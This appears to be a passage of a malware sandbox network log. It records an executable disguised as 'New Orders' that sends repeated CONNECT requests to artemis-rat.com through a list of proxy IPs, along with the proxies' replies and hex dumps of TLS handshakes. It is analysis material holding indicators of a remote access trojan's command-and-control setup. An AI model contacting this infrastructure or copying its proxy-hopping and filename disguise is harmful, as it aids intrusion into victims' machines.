                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of
                                                                                        Mar 11, 2024 16:16:44.935760975 CET269INData Raw: 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f
                                                                                        Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.38 (Debian) Server at artemis-rat.com Port 443


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        898192.168.2.952673147.75.34.86100077672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.218383074 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Mar 11, 2024 16:16:43.523983002 CET65INHTTP/1.1 200 Connection Established
                                                                                        Proxy-Agent: Zscaler/6.3


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        899192.168.2.95266934.95.243.12280817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.218770981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.960767031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.961604118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        900192.168.2.95260115.207.35.24110807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.235008955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.623970985 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        901192.168.2.952724104.19.171.188807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.235641003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.389967918 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        902192.168.2.952615103.118.44.13680807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.237248898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        903192.168.2.95268898.170.57.23141457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.237742901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        904192.168.2.95269098.162.25.7316537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.240973949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        905192.168.2.950399132.148.167.231469837672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.243217945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.273396969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        906192.168.2.952754104.16.25.216807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.244153023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.400237083 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        907192.168.2.95167551.15.139.59163797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.244467020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.438805103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.539042950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.561222076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:07.648238897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:19.741878033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:31.835858107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:55.851299047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:43.960702896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        908192.168.2.952759104.21.124.121807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.247339010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.401597977 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        909192.168.2.952677200.10.150.115807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.247795105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.585500002 CET109INHTTP/1.0 200 Connection Established
                                                                                        Proxy-agent: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_jk/1.2.41
                                                                                        Mar 11, 2024 16:16:50.907032967 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ef 20 62 69 a2 8f c3 eb 4c fa ae 1c 31 aa a9 ea 87 b4 bf 18 de ff da a0 7d 7c 7b 4e b1 9b ea 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                        Data Ascii: e biL1}|{N*,+0/$#('=<5/Uartemis-rat.com#
                                                                                        Mar 11, 2024 16:16:51.194067001 CET536INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ef 20 63 27 38 47 d3 77 e1 69 56 d5 e9 22 48 16 e8 0c bd 02 54 b7 87 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                                                                        Data Ascii: C?e c'8GwiV"HTDOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                                                                                        Mar 11, 2024 16:16:51.194103956 CET536INData Raw: c6 05 92 78 e0 4f 78 0a d2 60 c4 1d 4d 2f 50 10 83 ed 02 03 01 00 01 a3 82 02 75 30 82 02 71 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 05 a0 30 13 06 03 55 1d 25 04 0c 30 0a 06 08 2b 06 01 05 05 07 03 01 30 0c 06 03 55 1d 13 01 01 ff 04 02 30 00
                                                                                        Data Ascii: xOx`M/Pu0q0U0U%0+0U00U<IXM%A'CF20U#0n+_+0x+l0j05+0)http://ocsp.pki.goog/s/gts1p5/4mHaPTRzkCs01+0%http://pki.g
                                                                                        Mar 11, 2024 16:16:51.194226027 CET536INData Raw: 00 76 00 da b6 bf 6b 3f b5 b6 22 9f 9b c2 bb 5c 6b e8 70 91 71 6c bb 51 84 85 34 bd a4 3d 30 48 d7 fb ab 00 00 01 8d aa 09 6c 5a 00 00 04 03 00 47 30 45 02 20 14 4e 3d 50 55 e8 cc 24 1d 57 8b ac c0 53 a0 61 43 18 61 8b d3 67 2d ed cd aa b3 4e 5c
                                                                                        Data Ascii: vk?"\kpqlQ4=0HlZG0E N=PU$WSaCag-N\:b!ixanr9,1rtlY0*HR5zo_$F|QNc4+G@]LiY%}+]24'-6TsnqM}oVM)k+T/
                                                                                        Mar 11, 2024 16:16:51.194261074 CET536INData Raw: 30 39 33 30 30 30 30 30 34 32 5a 30 46 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 22 30 20 06 03 55 04 0a 13 19 47 6f 6f 67 6c 65 20 54 72 75 73 74 20 53 65 72 76 69 63 65 73 20 4c 4c 43 31 13 30 11 06 03 55 04 03 13 0a 47 54 53 20 43 41 20 31 50
                                                                                        Data Ascii: 0930000042Z0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50"0*H0$-D[>eO-XZ(juORUJ[H6%#_`e\:\m}0N<etxs1to
                                                                                        Mar 11, 2024 16:16:51.194302082 CET536INData Raw: 2b 06 01 05 05 07 30 01 86 1a 68 74 74 70 3a 2f 2f 6f 63 73 70 2e 70 6b 69 2e 67 6f 6f 67 2f 67 74 73 72 31 30 30 06 08 2b 06 01 05 05 07 30 02 86 24 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 72 65 70 6f 2f 63 65 72 74 73 2f 67 74 73 72 31
                                                                                        Data Ascii: +0http://ocsp.pki.goog/gtsr100+0$http://pki.goog/repo/certs/gtsr1.der04U-0+0)'%#http://crl.pki.goog/gtsr1/gtsr1.crl0MU F0D08+y0*0(+https://pki.goog/repository/0g0*Hlc'
                                                                                        Mar 11, 2024 16:16:51.194314003 CET536INData Raw: 08 0f 09 3e 23 5a c7 e3 42 2d 7a 36 e4 3d 98 96 60 39 98 ea d1 db 63 2a eb 78 09 b1 4e 21 b3 8e b7 ce 3e 92 f1 95 5c a4 39 d0 c0 2b c8 53 15 f5 d2 2f 82 cd 06 74 67 99 90 77 37 0a 97 2d c5 1c 1e f4 d0 5b e9 15 e3 ea 02 09 c8 13 d7 13 70 65 bf fb
                                                                                        Data Ascii: >#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*j%[ @4 awHI)adcGF9sO+Xe Uon=zcmf0b0Jwl6!
                                                                                        Mar 11, 2024 16:16:51.194348097 CET536INData Raw: f6 b1 f9 ce 84 1d b1 f9 c5 97 de ef b9 f2 a3 e9 bc 12 89 5e a7 aa 52 ab f8 23 27 cb a4 b1 9c 63 db d7 99 7e f0 0a 5e eb 68 a6 f4 c6 5a 47 0d 4d 10 33 e3 4e b1 13 a3 c8 18 6c 4b ec fc 09 90 df 9d 64 29 25 23 07 a1 b4 d2 3d 2e 60 e0 cf d2 09 87 bb
                                                                                        Data Ascii: ^R#'c~^hZGM3NlKd)%#=.`HMzY1.ml~&E=y(&<hS:+z.uVdOh=@\5lPL 3R2)%*Hrd8fcx{\wv
                                                                                        Mar 11, 2024 16:16:51.194382906 CET536INData Raw: 66 2c ef f0 89 13 71 3e 30 1f 06 03 55 1d 23 04 18 30 16 80 14 60 7b 66 1a 45 0d 97 ca 89 50 2f 7d 04 cd 34 a8 ff fc fd 4b 30 60 06 08 2b 06 01 05 05 07 01 01 04 54 30 52 30 25 06 08 2b 06 01 05 05 07 30 01 86 19 68 74 74 70 3a 2f 2f 6f 63 73 70
                                                                                        Data Ascii: f,q>0U#0`{fEP/}4K0`+T0R0%+0http://ocsp.pki.goog/gsr10)+0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+
                                                                                        Mar 11, 2024 16:16:51.194457054 CET306INData Raw: 28 03 00 1d 20 d6 93 e9 d1 c5 14 fa 96 ae da 43 bb 74 a3 4d 54 4d 2c a8 cc d4 73 05 a0 e8 f9 73 f1 3a 9d 90 12 08 04 01 00 77 3e 32 e5 27 da 0e 93 5d 2d 40 d2 1a 27 31 e4 07 13 46 f0 e0 91 7a 86 d0 02 01 e6 01 a6 c9 f5 b8 52 af 48 74 40 3c d1 76
                                                                                        Data Ascii: ( CtMTM,ss:w>2']-@'1FzRHt@<voipeaW(j*M'\R&hlil\sF7k9.(,z:*Y&?-K?Eg9Tj1E~?_)4/)Hx&9XNr~uxRzArvP


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        910192.168.2.952776172.67.182.102807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.261089087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.415545940 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        911192.168.2.952783104.20.125.124807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.261267900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.415457964 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        912192.168.2.952782162.159.241.160807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.261507034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.422483921 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
